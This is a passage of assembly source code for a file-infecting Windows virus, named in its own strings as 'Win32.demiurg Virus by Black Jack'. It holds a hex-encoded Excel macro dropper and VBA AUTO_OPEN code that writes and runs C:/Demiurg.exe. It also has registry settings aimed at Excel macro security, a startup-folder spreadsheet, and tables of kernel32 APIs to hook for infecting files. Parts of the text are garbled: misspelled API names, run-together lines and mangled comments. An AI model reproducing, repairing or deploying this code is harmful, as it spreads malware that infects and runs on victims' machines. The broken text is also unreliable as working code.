DB 054H, 000H, 061H, 042H, 01BH, 06CH, 042H, 0CFH
DB 031H, 064H, 019H, 0B9H, 005H, 04CH, 019H, 007H
DB 020H, 009H, 044H, 065H, 06DH, 069H, 075H, 058H
DB 072H, 067H, 01AH, 082H, 062H, 084H, 001H, 032H
DB 082H, 062H, 044H, 055H, 0A0H, 019H, 06DH, 0E0H
DB 01BH, 075H, 020H, 01BH, 067H, 030H, 00CH, 0B7H
DB 0E3H, 0C0H, 082H, 0EDH, 018H, 0BBH, 031H, 021H
DB 060H, 00ah, 0e5h, 018h, 021h, 015h, 0e6h, 039h
DB 000H, 044H, 069H, 065H, 073H, 065H, 041H, 072H
DB 062H, 065H, 069H, 074H, 073H, 06DH, 061H, 070HDB 070H, 065H, 000H, 044H, 000H, 069H, 000H, 065H
DB 000H, 073H, 000H, 065H, 000H, 041H, 000H, 072H
DB 000H, 062H, 000H, 065H, 000H, 069H, 000H, 074H
DB 000H, 073H, 000H, 06DH, 000H, 061H, 000H, 070H
DB 000H, 070H, 000H, 065H, 000H, 000H, 000H, 054H
DB 061H, 062H, 065H, 06CH, 06CH, 065H, 031H, 000H
DB 054H, 000H, 061H, 000H, 062H, 000H, 065H, 000H
DB 06CH, 000H, 06CH, 000H, 065H, 000H, 031H, 000H
DB 000H, 000H, 044H, 065H, 06DH, 069H, 075H, 072H
DB 067H, 000H, 044H, 000H, 065H, 000H, 06DH, 000H
DB 069H, 000H, 075H, 000H, 072H, 000H, 067H, 0E6H
DB 01AH, 000H, 049H, 044H, 03DH, 022H, 07BH, 044H
DB 039H, 045H, 034H, 036H, 045H, 046H, 030H, 02DH
DB 046H, 031H, 033H, 041H, 02DH, 031H, 031H, 044H
DB 033H, 02DH, 041H, 035H, 030H, 031H, 02DH, 041H
DB 036H, 046H, 033H, 044H, 044H, 041H, 044H, 038H
DB 032H, 033H, 039H, 07DH, 022H, 00DH, 00AH, 044H
DB 06FH, 063H, 075H, 06DH, 065H, 06EH, 074H, 03DH
DB 044H, 069H, 065H, 073H, 065H, 041H, 072H, 062H
DB 065H, 069H, 074H, 073H, 06DH, 061H, 070H, 070H
DB 065H, 02FH, 026H, 048H, 0E6H, 008H, 030H, 00DH
DB 00AH, 044H, 06FH, 063H, 075H, 06DH, 065H, 06EH
DB 074H, 03DH, 054H, 061H, 062H, 065H, 06CH, 06CH
DB 065H, 031H, 02FH, 026H, 048H, 0E6H, 008H, 030H
DB 00DH, 00AH, 04DH, 06FH, 064H, 075H, 06CH, 065H
DB 03DH, 044H, 065H, 06DH, 069H, 075H, 072H, 067H
DB 00DH, 00AH, 04EH, 061H, 06DH, 065H, 03DH, 022H
DB 056H, 042H, 041H, 050H, 072H, 06FH, 06AH, 065H
DB 063H, 074H, 022H, 00DH, 00AH, 048H, 065H, 06CH
DB 070H, 043H, 06FH, 06EH, 074H, 065H, 078H, 074H
DB 049H, 044H, 03DH, 022H, 030H, 022H, 00DH, 00AH
DB 043H, 04DH, 047H, 03DH, 022H, 039H, 039H, 039H
DB 042H, 039H, 038H, 039H, 038H, 039H, 043H, 039H
DB 038H, 039H, 043H, 039H, 038H, 039H, 043H, 039HDB 038H, 039H, 043H, 022H, 00DH, 00ah, 044H, 050H
DB 042H, 03DH, 022H, 033H, 032H, 033H, 030H, 033H
DB 033H, 041H, 038H, 043H, 044H, 041H, 039H, 043H
DB 044H, 041H, 039H, 043H, 044H, 022H, 00DH, 00AH
DB 047H, 043H, 03DH, 022H, 043H, 042H, 043H, 039H
DB 043H, 041H, 035H, 033H, 036H, 032H, 035H, 034H
DB 036H, 032H, 035H, 034H, 039H, 044H, 022H, 00DH
DB 00AH, 00DH, 00AH, 05BH, 048H, 06FH, 073H, 074H
DB 020H, 045H, 078H, 074H, 065H, 06EH, 064H, 065H
DB 072H, 020H, 049H, 06EH, 066H, 06FH, 05DH, 00DH
DB 00AH, 026H, 048H, 0E6H, 007H, 030H, 031H, 03DH
DB 07BH, 033H, 038H, 033H, 032H, 044H, 036H, 034H
DB 030H, 02DH, 043H, 046H, 039H, 030H, 02DH, 031H
DB 031H, 043H, 046H, 02DH, 038H, 045H, 034H, 033H
DB 02DH, 030H, 030H, 041H, 030H, 043H, 039H, 031H
DB 031H, 030H, 030H, 035H, 041H, 07DH, 03BH, 056H
DB 042H, 045H, 03BH, 026H, 048H, 0E6H, 008H, 030H
DB 00DH, 00ah, 00DH, 00ah, 05bh, 057h, 06fh, 072h
DB 06BH, 073H, 070H, 061H, 063H, 065H, 05DH, 00DH
DB 00AH, 044H, 069H, 065H, 073H, 065H, 041H, 072H
DB 062H, 065H, 069H, 074H, 073H, 06DH, 061H, 070H
DB 070H, 065H, 03DH, 030H, 02CH, 020H, 030H, 02CH
DB 020H, 030H, 02CH, 020H, 030H, 02CH, 020H, 043H
DB 00DH, 00AH, 054H, 061H, 062H, 065H, 06CH, 06CH
DB 065H, 031H, 03DH, 030H, 02CH, 020H, 030H, 02CH
DB 020H, 030H, 02CH, 020H, 030H, 02CH, 020H, 043H
DB 00DH, 00AH, 044H, 065H, 06DH, 069H, 075H, 072H
DB 067H, 03DH, 032H, 032H, 02CH, 020H, 032H, 032H
DB 02CH, 020H, 034H, 030H, 036H, 02CH, 020H, 031H
DB 039H, 031H, 02CH, 020H, 05AH, 00DH, 00ah, 0e6h
DB 008H, 000H, 0FEH, 0FFH, 000H, 000H, 004H, 000H
DB 002H, 0E6H, 011H, 000H, 001H, 000H, 000H, 000H
DB 0E0H, 085H, 09FH, 0F2H, 0F9H, 04FH, 068H, 010H
DB 0ABH, 091H, 008H, 000H, 02BH, 027H, 0B3H, 0D9HDB 030H, 000H, 000H, 000H, 084H, 000H, 000H, 000H
DB 006H, 000H, 000H, 000H, 001H, 000H, 000H, 000H
DB 038H, 000H, 000H, 000H, 004H, 000H, 000H, 000H
DB 040H, 000H, 000H, 000H, 008H, 000H, 000H, 000H
DB 04CH, 000H, 000H, 000H, 012H, 000H, 000H, 000H
DB 058H, 000H, 000H, 000H, 00CH, 000H, 000H, 000H
DB 070H, 000H, 000H, 000H, 013H, 000H, 000H, 000H
DB 07CH, 000H, 000H, 000H, 002H, 000H, 000H, 000H
DB 0E4H, 004H, 000H, 000H, 01EH, 000H, 000H, 000H
DB 002H, 000H, 000H, 000H, 042H, 000H, 073H, 000H
DB 01EH, 000H, 000H, 000H, 002H, 000H, 000H, 000H
DB 042H, 000H, 073H, 000H, 01EH, 000H, 000H, 000H
DB 010H, 000H, 000H, 000H, 04DH, 069H, 063H, 072H
DB 06FH, 073H, 06FH, 066H, 074H, 020H, 045H, 078H
DB 063H, 065H, 06CH, 000H, 040H, 000H, 000H, 000H
DB 080H, 0ECH, 0E8H, 033H, 03FH, 085H, 0BFH, 001H
DB 003H, 0E6H, 013H, 000H, 0FEH, 0FFH, 000H, 000H
DB 004H, 000H, 002H, 0E6H, 011H, 000H, 002H, 000H
DB 000H, 000H, 002H, 0D5H, 0CDH, 0D5H, 09CH, 02EH
DB 01BH, 010H, 093H, 097H, 008H, 000H, 02BH, 02CH
DB 0F9H, 0AEH, 044H, 000H, 000H, 000H, 005H, 0D5H
DB 0CDH, 0D5H, 09CH, 02EH, 01BH, 010H, 093H, 097H
DB 008H, 000H, 02BH, 02CH, 0F9H, 0AEH, 008H, 001H
DB 000H, 000H, 0C4H, 000H, 000H, 000H, 009H, 000H
DB 000H, 000H, 001H, 000H, 000H, 000H, 050H, 000H
DB 000H, 000H, 00FH, 000H, 000H, 000H, 058H, 000H
DB 000H, 000H, 017H, 000H, 000H, 000H, 064H, 000H
DB 000H, 000H, 00BH, 000H, 000H, 000H, 06CH, 000H
DB 000H, 000H, 010H, 000H, 000H, 000H, 074H, 000H
DB 000H, 000H, 013H, 000H, 000H, 000H, 07CH, 000H
DB 000H, 000H, 016H, 000H, 000H, 000H, 084H, 000H
DB 000H, 000H, 00DH, 000H, 000H, 000H, 08CH, 000H
DB 000H, 000H, 00CH, 000H, 000H, 000H, 0A1H, 000H
DB 000H, 000H, 002H, 000H, 000H, 000H, 0E4H, 004HDB 000H, 000H, 01EH, 000H, 000H, 000H, 001H, 0E6H
DB 005H, 000H, 06CH, 000H, 003H, 000H, 000H, 000H
DB 06AH, 010H, 008H, 000H, 00BH, 0E6H, 007H, 000H
DB 00BH, 0E6H, 007H, 000H, 00BH, 0E6H, 007H, 000H
DB 00BH, 0E6H, 007H, 000H, 01EH, 010H, 000H, 000H
DB 001H, 000H, 000H, 000H, 009H, 000H, 000H, 000H
DB 054H, 061H, 062H, 065H, 06CH, 06CH, 065H, 031H
DB 000H, 00CH, 010H, 000H, 000H, 002H, 000H, 000H
DB 000H, 01EH, 000H, 000H, 000H, 009H, 000H, 000H
DB 000H, 054H, 061H, 062H, 065H, 06CH, 06CH, 065H
DB 06EH, 000H, 003H, 000H, 000H, 000H, 001H, 0E6H
DB 005H, 000H, 098H, 000H, 000H, 000H, 003H, 0E6H
DB 007H, 000H, 020H, 000H, 000H, 000H, 001H, 000H
DB 000H, 000H, 036H, 000H, 000H, 000H, 002H, 000H
DB 000H, 000H, 03EH, 000H, 000H, 000H, 001H, 000H
DB 000H, 000H, 002H, 000H, 000H, 000H, 00ah, 000H
DB 000H, 000H, 05FH, 050H, 049H, 044H, 05FH, 047H
DB 055H, 049H, 044H, 000H, 002H, 000H, 000H, 000H
DB 0E4H, 004H, 000H, 000H, 041H, 000H, 000H, 000H
DB 04EH, 000H, 000H, 000H, 07BH, 000H, 044H, 000H
DB 039H, 000H, 045H, 000H, 034H, 000H, 036H, 000H
DB 045H, 000H, 046H, 000H, 031H, 000H, 02DH, 000H
DB 046H, 000H, 031H, 000H, 033H, 000H, 041H, 000H
DB 02DH, 000H, 031H, 000H, 031H, 000H, 044H, 000H
DB 033H, 000H, 02DH, 000H, 041H, 000H, 035H, 000H
DB 030H, 000H, 031H, 000H, 02DH, 000H, 041H, 000H
DB 036H, 000H, 046H, 000H, 033H, 000H, 044H, 000H
DB 044H, 000H, 041H, 000H, 044H, 000H, 038H, 000H
DB 032H, 000H, 033H, 000H, 039H, 000H, 07DH, 0E6H
DB 027H, 000H, 005H, 000H, 044H, 000H, 06FH, 000H
DB 063H, 000H, 075H, 000H, 06DH, 000H, 065H, 000H
DB 06EH, 000H, 074H, 000H, 053H, 000H, 075H, 000H
DB 06DH, 000H, 06DH, 000H, 061H, 000H, 072H, 000H
DB 079H, 000H, 049H, 000H, 06EH, 000H, 066H, 000HDB 06FH, 000H, 072H, 000H, 06DH, 000H, 061H, 000H
DB 074H, 000H, 069H, 000H, 06FH, 000H, 06EH, 0E6H
DB 00bh, 000H, 038H, 000H, 002H, 000H, 0e6H, 00CH
DB 0FFH, 0E6H, 024H, 000H, 0B1H, 000H, 000H, 000H
DB 0A0H, 001H, 0E6H, 006H, 000H, 001H, 000H, 043H
DB 000H, 06FH, 000H, 06DH, 000H, 070H, 000H, 04FH
DB 000H, 062H, 000H, 06AH, 0E6H, 031H, 000H, 012H
DB 000H, 002H, 000H, 0E6H, 00CH, 0FFH, 0E6H, 024H
DB 000H, 0B8H, 000H, 000H, 000H, 068H, 0E6H, 04BH
DB 000H, 0E6H, 00CH, 0FFH, 0E6H, 074H, 000H, 0E6H
DB 00CH, 0FFH, 0E6H, 030H, 000H, 001H, 000H, 0FEH
DB 0FFH, 003H, 00ah, 000H, 000H, 0E6H, 004H, 0FFH
DB 020H, 008H, 002H, 0E6H, 005H, 000H, 0C0H, 0E6H
DB 006H, 000H, 046H, 01CH, 000H, 000H, 000H, 04DH
DB 069H, 063H, 072H, 06FH, 073H, 06FH, 066H, 074H
DB 020H, 045H, 078H, 063H, 065H, 06CH, 020H, 038H
DB 02EH, 030H, 02DH, 054H, 061H, 062H, 065H, 06CH
DB 06CH, 065H, 000H, 006H, 000H, 000H, 000H, 042H
DB 069H, 066H, 066H, 038H, 000H, 00Eh, 000H, 000H
DB 000H, 045H, 078H, 063H, 065H, 06CH, 02EH, 053H
DB 068H, 065H, 065H, 074H, 02EH, 038H, 000H, 0F4H
DB 039H, 0B2H, 071H, 0E6H, 0FFH, 000H, 0E6H, 0A5H
DB 000H
Macro_Dropper_size EQU ($ - macro_dropper)
; ----- Macro Code ------------------------------------------------------------------------------------------------------ ----------------
;
This is the macro code thing will be stored in infected .xls files. IT DROPS
The PE EXE Dropper as C: /Demiurg.exe and Executes It. this code is
Incomplete, The Data of The Dropper Will Be Converted to VBA Array
; instructions at the time Excel is infected, and the full vba code will be
Stored in the file c: /demiurg.sys the; this is the file tria Will be used
; to infect .xls files by the dropper
Main_macro_code:
DB "Attribute VB_Name =" "Demiurg" ", 0DH, 0AHDB" Public A ", 0DH, 0AH
DB "SUB AUTO_OPEN ()", 0DH, 0AH
DB "open" "c: /demiurg.exe" "for binary as # 1", 0DH, 0AH
DB "B", 0DH, 0AH
DB "C", 0DH, 0AH
DB "D", 0DH, 0AH
DB "e", 0DH, 0AH
DB "f", 0DH, 0AH
DB "g", 0DH, 0AH
DB "Close # 1", 0DH, 0AH
DB "T = shell (" "C: /Demiurg.exe" ", vbnormalfocus", 0DH, 0AH
DB "End Sub", 0DH, 0AH
DB "SUB W ()", 0DH, 0AH
DB "for i = 0 to 127", 0DH, 0AH
DB "V $ = CHR $ (A (i))", 0DH, 0AH
DB "PUT # 1, V $", 0DH, 0AH
DB "Next", 0DH, 0AH
END_SUB:
DB "End Sub", 0DH, 0AH
Main_macro_code_size EQU ($ - main_macro_code)
Sub_Header:
SUB_NAME EQU BYTE PTR ($ 4)
DB "SUB B ()", 0DH, 0AH
RegKey DB "Software / Microsoft / Office / 8.0 / Excel", 0
Office_version_number EQU BYTE PTR (Offset Regkey 26)
Subkey_97 DB "Microsoft Excel", 0
Subkey_2k DB "Security", 0
Subkey_installroot DB "InstallRoot", 0
Regvalue_Options DB "Options6", 0
Regvalue_2k DB "Level", 0
Regvalue_path DB "Path", 0
Demiurg_XLS DB "/XLSTART/Demiurg.xls", 0
Macro_FileName DB "C: /Demiurg.sys", 0
KERNEL32_DLL DB "/kernel32.dll", 0
PATH_BUFFER1 DB 260 DUP (?)
PATH_BUFFER2 DB 260 DUP (?)
SIZE_BUFFER DD 260
REG_SZ DD 1
Regvalue_dword DD 0
REG_HANDLE1 DD?
REG_HANDLE2 DD?
DOS_EXE_SIZE DD?
Resource_table dd?
HEAP_BUFFER DD?
DUMMY_DWORD DD?
FILENAME_OFS DD?
Attributes dd?
CREATIONTIME DQ?
LastAccesstime DQ?
LastWritetime DQ?
FILSIZE DD?
FILEHANDLE DD?
Maphandle DD? MapBase DD?
Virus_rva dd?
Virus_start dd?
KERNEL32 DD 0
Kernel32name DB "kernel32", 0
GetModuleHandlea DB "getModuleHandlea", 0
L_GMH EQU $ - Offset getModuleHandlea
KERNEL32_API_NAMES_TABLE:
N_GlobalAlloc DB "GlobalAlloc", 0
N_GlobalFree DB "Globalfree", 0
N_GetWindowsDirectorya DB "getWindowsDirectorya", 0
N_getsystemDirectorya DB "getsystemdirectorya", 0
N_lstrcata DB "Lstrcata", 0
N_loadLibrarya DB "LoadLibrarya", 0
n_closeHandle DB "CloseHandle", 0
N_GETFILESIZE DB "getfilesize", 0
N_GETFILETIME DB "getfiletime", 0
n_setfiletime db "setfiletime", 0
N_setenDoffile db "setndoffile", 0
n_setfilepointer db "setfilepointer", 0
n_createfilemappinga db "createfilemappinga", 0
n_mapviewoffile db "mappviousoffile", 0
N_unmapviewoffile db "unmapViewoffile", 0
N_WideChartomultibyte DB "Widechartomultibyte", 0
Names of Apis That Are Both Used and hooded
HOOKED_API_NAMES_TABLE:
N_createfilea DB "CreateFilea", 0
N_GETFileAttributesa DB "getfileattributesa", 0
N_setfileAttributesa DB "SetFileAttributesa", 0
n_copyfilea db "copyfilea", 0
N_movefileexa DB "Movefileexa", 0
Names of Apis That Are More ONLY HOOKED and NOT USED
N_Movefilea DB "Movefilea", 0
N__lopen db "_lopen", 0
Number_of_hooked_apis EQU 7
KERNEL32_API_ADDRESS_TABLE:
GLOBALLOC DD?
GLOBALFREE DD?
GetWindowsDirectorya DD?
GetSystemDirectorya DD?
LSTRCATA DD?
LoadLibrarya DD?
CloseHandle DD?
GetFiLesize DD?
GetFileTime DD?
SETFILETIME DD?
Setndoffile dd?
SETFILEPOINTER DD?
CREATEFILEMAPPINGA DD?
MapViewOffile DD?
UnmapViewoffile dd?
WideChartomultibyte DD?
CREATEFILEA DD?
GetFileAttributesa dd?
SETFILEATTRIBUTESA DD?
CopyFilea DD?
MovefileExa DD?
Number_of_kernel32_apis EQU (($ - kernel32_api_address_table) / 4)
Advapi32_dll DB "Advapi32.dll", 0
Advapi32_api_names_table:
N_regopenkeyexa db "regopenkeyexa", 0
N_regcreateKeyexa DB "regreateKeyexa", 0
n_regqueryvalueexa DB "RegQueryValueexa", 0
N_regSetValueexa DB "RegSetValueexa", 0
n_regclosekey DB "RegcloseKey", 0
Advapi32_api_address_table:
RegopenKeyExa DD?
RegcreateKeyExa DD?
RegQueryValueExa DD?
RegSetValueExa DD?
REGCLOSEKEY DD?
Number_of_advapi32_apis EQU (($ - Advapi32_API_ADDRESS_TABE) / 4)
ImageHLP_DLL DB "Imagehlp.dll", 0
ChecksummappedFile DB "ChecksummappedFile", 0
Virus_end:
.code
Dummy_host:
PUSH 0
Push Offset Caption
Push Offset Message
PUSH 0
Call Messageboxa
PUSH 0
Call EXITPROCESS
Caption DB "Win32.demiurg Virus by Black Jack", 0
Message DB "First Generation Host", 0
End Start
